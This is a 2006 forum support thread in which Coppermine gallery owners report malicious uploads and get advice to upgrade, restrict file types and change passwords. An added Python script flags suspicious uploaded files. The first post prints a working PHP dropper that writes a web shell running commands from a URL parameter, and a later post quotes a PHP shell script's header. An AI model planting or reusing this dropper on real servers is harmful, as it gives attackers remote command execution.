Author Topic: Site hacked..  (Read 4972 times)

togi

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 61
Site hacked..
« on: February 27, 2006, 01:47:46 am »

My site was hacked once.. upgraded it to a newer version and it seems like I am getting strange visitors..
I have limited uploads to images and txt/pdf and movies..

How do I stop these hackers from coming back?

here is one of the files uploaded.. title is pip.php

<?php
     $suntzu=fopen("shell.php","w");
     fputs($suntzu,"<?php system(\$HTTP_GET_VARS[CMD]);?>");
     fclose($suntzu);
     chmod("shell.php",777);
?>


there was another guy today.. but deleted it without saving..
he uploaded an imagename.php.jpg ... I found it fishy so I deleted it..

would like to hear measures others have taken to make the site free from
hackers.. thank you very much!

« Last Edit: February 27, 2006, 08:12:38 am by GauGau »
Logged

kegobeer

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 4637
  • Beer - it does a body good!
    • The Kazebeer Family Website
Re: Site hacked..
« Reply #1 on: February 27, 2006, 03:26:16 am »

Here are some ideas:

Don't allow visitors to upload files.  Verify all of your members prior to allowing them to upload files.  Only allow jpeg files.
Logged
Do not send me a private message unless I ask for one.  Make your post public so everyone can benefit.

There are no stupid questions
But there are a LOT of inquisitive idiots

togi

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 61
Re: Site hacked..
« Reply #2 on: February 27, 2006, 04:34:13 am »

Thanks for the tip.. I set the movie, audio and document type to "none" is that ok?  I set images to jpg/gif/tif
Logged

Abbas Ali

  • Administrator
  • Coppermine addict
  • *****
  • Country: in
  • Offline Offline
  • Gender: Male
  • Posts: 2165
  • Spread the PHP Web
    • Ranium Systems
Re: Site hacked..
« Reply #3 on: February 27, 2006, 07:44:21 am »

Upgrade to 1.4.4 asap. The above file "pip.php" which was uploaded to your site is because of a recent vulnerability found in cpg. The hacker must have extracted your database password and other details. Please change them asap.
Logged
Chief Geek at Ranium Systems

Fudgemaster

  • Coppermine novice
  • *
  • Offline Offline
  • Gender: Male
  • Posts: 45
    • Trackdays, Car shows, Nature and some misc photos
Re: Site hacked..
« Reply #4 on: February 27, 2006, 02:19:51 pm »

I got a new user also, uploaded 2 files.
123.php.php.rar and 123.php.php7.rar

Both are php files..

Code: [Select]
*****************************************************************************************
*                           PHPSHELL.PHP  BY MACKER     30 March 2003                   *
*****************************************************************************************
*                                                                                       * 
*   Welcome to Macker's PHPShell script...                                              *
*   This script will allow you to browse webservers etc...                              *
*   Just copy the file to your directory and open it in your Internet Browser.          *
*                                                                                       *
*   The webserver should support PHP...                                                 *
*                                                                                       *
*   You can modify the script if you want, but please send me a copy to:                * 
*                               DRAZZ01@HOTMAIL.COM                                     *
*****************************************************************************************

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!   PLEASE NOTE: You should use this script at own risk, it should do damage to the   !!
!!                Sites or even the server... You are responsible for your own deeds.  !!
!!                The admin of your webserver should always know you are using this    !!
!!                script.                                                              !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
*/

Damnit. and all because of me. I upgraded to 1.4.3 and didn't realize the upload permissions get reset in upgrade =(
The remotethingamajigger update is applied now and passwords are renewed.

Gotta go thru every dir etc. for crap  :'(
Logged
--
It's an insane world.. But I'm proud to be a part of it.

Stramm

  • Dev Team member
  • Coppermine addict
  • ****
  • Country: 00
  • Offline Offline
  • Gender: Male
  • Posts: 6006
    • Bettis Wollwelt
Re: Site hacked..
« Reply #5 on: February 27, 2006, 02:29:17 pm »

Fudgemaster...
if your server is properly configured then it won't parse rar as php and your box didn't get hacked at all. Just a lame try of a script kiddie with no effect at all. Still it's best to disable all extensions you don't need
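
An added example, not part of any post in this thread: a sweep of an upload directory of the kind Fudgemaster describes doing by hand. It flags names that carry a script extension in any position (pip.php, imagename.php.jpg, 123.php.php7.rar) and files whose content contains a PHP open tag. The extension list, function names and sample tree are assumptions constructed for illustration; match the list to the handlers your own server maps to PHP.

```python
import os
import re
import tempfile

# Assumed set of extensions a server may hand to PHP; adjust to your config.
SCRIPT_EXT = re.compile(r"^(php\d?|phtml|phar)$", re.IGNORECASE)
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)

def script_ext_positions(filename):
    """Return every dot-separated part of the name that is a script extension.
    Checking all parts, not only the last, catches imagename.php.jpg."""
    return [p for p in filename.split(".")[1:] if SCRIPT_EXT.match(p)]

def scan_upload_tree(root, head_bytes=65536):
    """Walk root; return sorted (relative_path, reasons) for suspicious files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            reasons = ["script-extension"] if script_ext_positions(name) else []
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    if PHP_TAG.search(fh.read(head_bytes)):
                        reasons.append("php-open-tag")
            except OSError:
                reasons.append("unreadable")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)

def build_sample_tree():
    """Constructed sample: file names from the thread plus harmless filler."""
    root = tempfile.mkdtemp(prefix="albums_")
    samples = {
        "pip.php": b"<?php /* constructed placeholder */ ?>",
        "imagename.php.jpg": b"\xff\xd8\xff\xe0 constructed JPEG header only",
        "123.php.php7.rar": b"Rar!\x1a\x07\x00 constructed archive header",
        "holiday.jpg": b"\xff\xd8\xff\xe0 constructed clean image",
        "notes.txt": b"caption text <?php echo 1; ?>",
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root

if __name__ == "__main__":
    for rel, why in scan_upload_tree(build_sample_tree()):
        print(rel, ",".join(why))
```

A hit on "script-extension" alone does not mean the file ever executed; as the post above says, that depends on whether the server parses that name as PHP.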

Fudgemaster

  • Coppermine novice
  • *
  • Offline Offline
  • Gender: Male
  • Posts: 45
    • Trackdays, Car shows, Nature and some misc photos
Re: Site hacked..
« Reply #6 on: February 27, 2006, 02:36:07 pm »

Fudgemaster...
if your server is properly configured then it won't parse rar as php and your box didn't get hacked at all. Just a lame try of a script kiddie with no effect at all. Still it's best to disable all extensions you don't need

Oh thank You. that was a relief to hear.
I almost soiled myself at work today when I noticed that extra crap on my
site because I've never allowed anyone else than myself to upload anything.
Logged
--
It's an insane world.. But I'm proud to be a part of it.